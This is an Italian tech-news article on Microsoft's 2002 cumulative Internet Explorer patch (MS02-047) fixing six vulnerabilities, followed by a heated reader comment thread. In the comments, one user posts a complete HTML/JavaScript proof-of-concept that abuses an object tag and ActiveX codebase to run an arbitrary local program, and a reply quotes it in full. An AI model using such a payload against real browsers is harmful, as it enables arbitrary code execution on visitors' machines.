Tappate sei falle di Internet Explorer

Microsoft esorta gli utenti di Internet Explorer ad applicare una nuova megapatch che corregge sei nuove vulnerabilitÓ di sicurezza

Redmond (USA) - Microsoft, che nel rilascio delle patch cumulative per Internet Explorer sembra ormai seguire una cadenza trimestrale, lo scorso giovedý ha messo a disposizione per il download una nuova megapatch che, oltre a correggere tutte le vecchie vulnerabilitÓ delle versioni 5.01, 5.5 e 6.0 del proprio browser, mette fine a sei nuovi problemi di sicurezza di media e grave entitÓ.

Le nuove falle corrette dalla megapatch comprendono una nota vulnerabilitÓ riguardante il protocollo Gopher implementato in IE, un buffer overrun contenuto in un controllo ActiveX utilizzato per visualizzare testi formattati in un certo modo, una vulnerabilitÓ riguardante la gestione di un'istruzione HTML per la visualizzazione di dati XML, un problema connesso alla verifica Cross Domain e il tag Object, un bug nel modo in cui IE rappresenta l'origine di un file all'interno della finestra di dialogo del download, una nuova variante della vulnerabilitÓ nota come Cross-Site Scripting in Local HTML Resource.

Le prime due vulnerabilitÓ riguardano tutte e tre le versioni di IE ancora supportate da Microsoft (la 5.01, la 5.5 e la 6.0) e possono consentire ad un aggressore di prendere possesso di un computer remoto od eseguire codice a sua scelta. Le altre due falle, classificate da Microsoft di moderato rischio, possono invece essere rispettivamente usate da webmaster senza scrupoli per leggere alcuni tipi di file sul computer di un utente e per celare l'origine di un file offerto per il download. Il problema di sicurezza legato alla verifica Cross Domain, considerato di livello critico, pu˛ consentire ad un aggressore di leggere, ma non scrivere, qualsiasi file su di un computer remoto che possa essere visualizzato in una finestra del browser. La nuova vulnerabilitÓ cross-site scripting, che non affligge IE 6.0, Ŕ classificata di rischio moderato e, come le altre debolezze di questo tipo, pu˛ essere sfruttata da un cracker per eseguire sulla macchina dell'utente uno script nella zona di sicurezza "Computer Locale".
La megapatch, discussa nel bollettino di sicurezza MS02-047, pu˛ essere scaricata da qui o attraverso Windows Update.

La precedente patch cumulativa per IE venne rilasciata da Microsoft lo scorso maggio e, come quella attuale, andava a correggere sei nuove vulnerabilitÓ di sicurezza.
TAG: microsoft
12 Commenti alla Notizia Tappate sei falle di Internet Explorer
Ordina
  • c'era da aspettarselo...è vero ke le vulnerabilità di un programma devono essere "scoperte" con l'utilizzo ma a questo punto mi sembra eccessivo...ora mi kiedo...pur sapendo già la risposta...micro$oft ke rilascia a fare applicativi insicuri così in fretta senza neppure testarli come si deve? vedi winXP - vedi winME - vedi le varie versioni di internet explorer etc..etc..
    ...la risposta è kiara e semplice..BUSINESS e $, tanti $ ! Possibile ke non si riesca a sviluppare un software su cui lavorare senza aver fretta di passare ad una nuova versione ke magari per qualke sciocchezza costi parekkio d+ ?? Possibile se è firmata MICRO$OFT!
    non+autenticato


  • - Scritto da: icetw0o
    > c'era da aspettarselo...è vero ke le
    > vulnerabilità di un programma devono essere
    > "scoperte" con l'utilizzo ma a questo punto
    > mi sembra eccessivo...ora mi kiedo...pur
    > sapendo già la risposta...micro$oft ke
    > rilascia a fare applicativi insicuri così in
    > fretta senza neppure testarli come si deve?
    > vedi winXP - vedi winME - vedi le varie
    > versioni di internet explorer etc..etc..
    > ...la risposta è kiara e semplice..BUSINESS
    > e $, tanti $ ! Possibile ke non si riesca a
    > sviluppare un software su cui lavorare senza
    > aver fretta di passare ad una nuova versione
    > ke magari per qualke sciocchezza costi
    > parekkio d+ ?? Possibile se è firmata
    > MICRO$OFT!


    solite riflessioni dell'utonto che non capisce assolutamente niente di programmazione.
    potrei dilungarmi e perdere tempo prezioso per spiegarti la complessita computazionale necessaria per individuare tutti bug di un programma, la necessita di mantenere codice per supportare vecchie versioni di SO ecc......
    ma sei utonto quindi che vuoi capire c'è la patch istalla e ritorna a utontare.
    non+autenticato
  • ihihihih... solo 2 cose...
    1) esponiti usa il tuo nome... nn nasconderti tanto nn ti kicka nessuno qui ;P
    2) vuoi dire ke nn è vero? Vuoi dirmi ke micro$oft nn pensa solo a lanciare un suo prodotto il + presto possibile? Io dico questo... microsoft sforna prodotti scadenti all'ordine del mese e poi ci lancia patch su patch...e ti sembra giusto? a questo punto l'utonto mi sembri tè ;P ihihihihihihih
    baci e abbracci icetw0o...
    non+autenticato
  • - Scritto da: icetw0o
    > ihihihih... solo 2 cose...
    > 1) esponiti usa il tuo nome... nn
    > nasconderti tanto nn ti kicka nessuno qui ;P

    Perche', "icetw0o" e' il tuo nome di battesimo, vero?


    > 2) vuoi dire ke nn è vero? Vuoi dirmi ke
    > micro$oft nn pensa solo a lanciare un suo
    > prodotto il + presto possibile?

    Senti, ma tu sei nel mondo del lavoro oppure vai all'asilo? Conosci forse aziende che non pensano alla produzione e al mercato?


    > questo... microsoft sforna prodotti scadenti
    > all'ordine del mese e poi ci lancia patch su
    > patch...e ti sembra giusto? a questo punto
    > l'utonto mi sembri tè

    Le patch sono quotidiane per QUALUNQUE software o sistema operativo, essendo un UTENTE linux dovresti ben saperlo.
    Ed essendo almeno un po' (credo) nel mondo dell'informatica penso che tu riesca a capire che non dipende stettamente dalle tempistiche di sviluppo (tranne in qualche caso tragico) ma e' endemico dei sistemi esposti in rete.
    Infatti, la stragrande maggioranza delle patch (Windows o Linux che siano, bada bene) avrai notato che riguardano buchi di sicurezza, e come ben sai, potresti lavorarci 20 anni in laboratorio ma alla fin fine, sul campo, qualche security bug lo si scova sempre (Windows o Linux che sia, ripeto).


    > ;P ihihihihihihih
    > baci e abbracci icetw0o...
    p.s. Cosa vuol dire "ihihihihihihih"? non conosco le abbreviazioni chattarole..


    Spero di essere stato comprensibile ed educato
    ciao
    non+autenticato
  • un'altra cosa...
    >[...]la necessita di mantenere codice per
    >supportare vecchie versioni di SO ecc...[...]

    Cioè ma dico...ci rendiamo conto? ;P vuoi dirmi ke internet explorer 6.x gira su un win3.x ? hiihihihihihi son storto io o è la città ke si è capovolta? =)) bah...mi sembra ke hai sbagliato UTONTOOcchiolino)) ciao amico ciao...
    non+autenticato
  • E' il colmo che non sia ancora stato patchato questo bug di IE, che esegue qualsiasi comando sul computer dell'utente.... (nell'esempio "c:/windows/system32/calc.exe")

    <html>
    <body>

    <object id="dataObject" type="text/html" data="empty.html" style="width:1px;left:-10000px">
    </object>

    <script type="text/javascript">
    var ref = document.getElementById("dataObject").object;

    function ExecuteFile(){
    ref.location.href = "file://c:/fdbfd" + (new Date()).getTime();
    setTimeout("CheckFile()",1000);
    }

    function CheckFile(){
    var sHTML = HtmlInput.value.replace(/\$WHATFILE\$/, "c:/windows/system32/calc.exe" );
    ref.body.insertAdjacentHTML( "beforeEnd" , sHTML );
    }

    ExecuteFile()

    </script>
    <textarea id=HtmlInput style="display:none" name="textarea">
    <object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="$WHATFILE$"></object>
    </textarea>


    </body>
    </html>
    non+autenticato


  • - Scritto da: Neo
    > E' il colmo che non sia ancora stato
    > patchato questo bug di IE, che esegue
    > qualsiasi comando sul computer
    > dell'utente.... (nell'esempio
    > "c:/windows/system32/calc.exe")
    >
    > <html>
    > <body>
    >
    > <object id="dataObject" type="text/html"
    > data="empty.html"
    > style="width:1px;left:-10000px">
    > </object>
    >
    > <script type="text/javascript">
    > var ref =
    > document.getElementById("dataObject").object;
    >
    > function ExecuteFile(){
    > ref.location.href = "file://c:/fdbfd" + (new
    > Date()).getTime();
    > setTimeout("CheckFile()",1000);
    > }
    >
    > function CheckFile(){
    > var sHTML =
    > HtmlInput.value.replace(/\$WHATFILE\$/,
    > "c:/windows/system32/calc.exe" );
    > ref.body.insertAdjacentHTML( "beforeEnd" ,
    > sHTML );
    > }
    >
    > ExecuteFile()
    >
    > </script>
    > <textarea id=HtmlInput style="display:none"
    > name="textarea">
    > <object
    > classid="clsid:11111111-1111-1111-1111-111111
    >

    ma allora ci fai o ci sei, e la seconda volta che riscrivi la stessa idiozia.
    se tieni tutte le protezioni del browser a zero e ovvio che questo che e un finto problema ti si manifesta, alza le protezioni e vedrai che nessuno ti insidiera il pc.
    capisci che è inutile andare in giro con un carroarmato che ha tutte le botole aperte, chiudile, oppure che voi una patch che le chiuda per te alora sei utonto.
    non+autenticato
  • L'installazione di default non prevede l'impostazione dei criteri di protezione a livello alto. Questo significa che, generalmente, questo attacco è tuttora possibile. Quelli che tu definisci utonti, sono in realtà la maggior parte degli utenti (non è mia intenzione essere offensivo, è solo una constatazione), ne segue che questa è una falla pericolosa per molte persone.
    Il problema sta nella filosofia con il quale IE è stato concepito, nessuna falla potrà rimediarvi.
    non+autenticato


  • - Scritto da: nul
    > L'installazione di default non prevede
    > l'impostazione dei criteri di protezione a
    > livello alto. Questo significa che,
    > generalmente, questo attacco è tuttora
    > possibile.

    Sbagliato.
    Anche solo aggiornando dalle versioni precedenti IE6 alza le protezioni fino a disabilitare addirittura i cookies, tanto che e' "tragedia" comune ritrovarsi gli accessi negati in molti siti e dover ricordarsi di andare nelle opzioni ad abilitarli (con prompt o senza...)

    Ma usando Linux forse non potevi saperlo... suppongo che tu ci abbia provato...

    > Il problema sta nella filosofia con il quale
    > IE è stato concepito, nessuna falla potrà
    > rimediarvi.

    Il problema e' che molti parlano e scrivono tanto per passare il tempo, sarebbe meglio essere sicuri prima di sputtanare e/o sputtanarsi (non era questo il caso, comunque)

    Bye
    non+autenticato
  • >Sbagliato.
    >Anche solo aggiornando dalle versioni precedenti IE6 >alza le protezioni fino a disabilitare addirittura i >cookies, tanto che e' "tragedia" comune ritrovarsi >gli accessi negati in molti siti e dover ricordarsi >di andare nelle opzioni ad abilitarli (con prompt o >senza...)

    Si scusa, non ero ancora corso ad aggiornarmi all'ultima versione di Internet Explorer. Malauguratamente utilizzo addirittura la 5.5!!

    In ogni caso su un altro pc con ie 6 ho voluto provare a selezionare, nelle opzioni di protezione, il livello predefinito e mi è stato selezionato il livello medio. Ed il problema si presentava ancora.

    Poi ho provato ad alzare il livello di protezione ad alto. Ed il problema non mi presentava più. Vorrei per elencarti le caratterisitche che Explorer riporta per tale livello:

    -Massima sicurezza per l'esplorazione ma minima praticità di utilizzo

    -Funzionalità a ridottta protezione non attive

    -Adatta per siti internet dal contenuto potenzialmente dannoso (ma come fai a spaerlo prima?)

    Lascio a voi ogni valutazione del caso.

    >Ma usando Linux forse non potevi saperlo... >suppongo che tu ci abbia provato...

    In realtà uso molto di più Microsoft che Linux
    non+autenticato
  • E' la seconda volta che rispondi in maniera idiota. Non sono io che devo alzare le protezioni, è la Micro$oft che deve tappare il buco.
    Visto che vuoi un carro armato ben chiuso, prova a staccare la spina del tuo computer. Vedrai come navighi sicuro.
    Gli Active-x sono utili, ce ne sono però alcuni pericolosi che vanno sistemati. Se sei ustr**zo, non è colpa mia.
    non+autenticato

  • - Scritto da: Neo
    > E' la seconda volta che rispondi in maniera
    > idiota. Non sono io che devo alzare le
    > protezioni, è la Micro$oft che deve tappare
    > il buco.
    > Visto che vuoi un carro armato ben chiuso,
    > prova a staccare la spina del tuo computer.
    > Vedrai come navighi sicuro.
    > Gli Active-x sono utili, ce ne sono però
    > alcuni pericolosi che vanno sistemati. Se
    > sei ustr**zo, non è colpa mia.

    Sbagliato.
    Vai a leggerti la mia risposta al post precendente.
    non+autenticato